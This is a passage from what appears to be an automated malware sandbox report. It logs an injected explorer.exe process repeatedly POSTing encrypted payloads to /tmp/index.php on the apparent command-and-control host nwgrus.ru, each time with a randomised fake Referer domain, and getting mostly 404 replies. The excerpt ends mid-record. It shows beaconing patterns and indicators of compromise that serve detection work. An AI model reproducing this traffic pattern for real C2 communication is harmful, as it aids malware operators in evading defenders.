                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      21192.168.2.449757109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:56.168869972 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://yvnodxcwkvd.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 115
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:56.168869972 CEST115OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 7f 07 ab 89
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuM;p{n3Wmu/
                                      Oct 14, 2024 10:02:56.967535973 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:56 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      22192.168.2.449758109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:56.975419044 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://dgiwvsfymyh.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 180
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:56.977700949 CEST180OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 7e 1b ef e7
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu~(ggN!ZE\*{MRsQt;;Z)H)^6$8$1~%z(h%U
                                      Oct 14, 2024 10:02:57.801300049 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:57 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      23192.168.2.449759109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:57.810257912 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://wrjytrffmsivlanr.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 138
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:57.810257912 CEST138OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 2b 54 c3 fd
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu+T~Qubfd:QR`{RcY:oC#+
                                      Oct 14, 2024 10:02:58.602148056 CEST137INHTTP/1.1 200 OK
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:58 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      24192.168.2.449760109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:58.611738920 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://estmwlacexvuyc.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 214
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:58.611777067 CEST214OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 35 21 a4 ba
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu5!wH[sUk.z-bqFq=x24C5UuE'{KFR1amYoN)@)pBV:)G'
                                      Oct 14, 2024 10:02:59.500734091 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:02:59 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      25192.168.2.449761109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:02:59.509779930 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://hvvqajwisec.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 162
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:02:59.509802103 CEST162OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 62 0a d2 f0
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vubMdcKJi2t1\qLxm@_N%ZH[+sM(|
                                      Oct 14, 2024 10:03:00.324894905 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:03:00 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      26192.168.2.449762109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:03:00.333209991 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://kctacxfnspruuv.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 166
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:03:00.333230972 CEST166OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 5c 39 ea 9d
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu\9w\dq+2ykts2/IwI:ZWT0KwK</
                                      Oct 14, 2024 10:03:01.241354942 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:03:01 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      27192.168.2.449763109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:03:01.404306889 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://ijnkeenpcqt.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 348
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:03:01.404340982 CEST348OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 3f 53 df bd
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu?S vk!)LYho%@A.N+4z6D-W8C+)E ZO\ z0['&8Kc1D[F^f"3D=/
                                      Oct 14, 2024 10:03:02.205260992 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:03:02 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      28192.168.2.449764109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:03:02.219935894 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://lnnfpwyulse.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 208
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:03:02.219971895 CEST208OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 22 0b ee e0
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu"gHgO+6nu6wA%FxF<E8U:%K(,"u@O$Qq-7}
                                      Oct 14, 2024 10:03:03.013564110 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:03:02 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      29192.168.2.449765109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:03:03.022027969 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://pkoncbxvmuq.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 137
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:03:03.022027969 CEST137OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 21 2e c1 f4
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu!.Vcr^bqe2D4]+vE=
                                      Oct 14, 2024 10:03:03.815471888 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:03:03 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 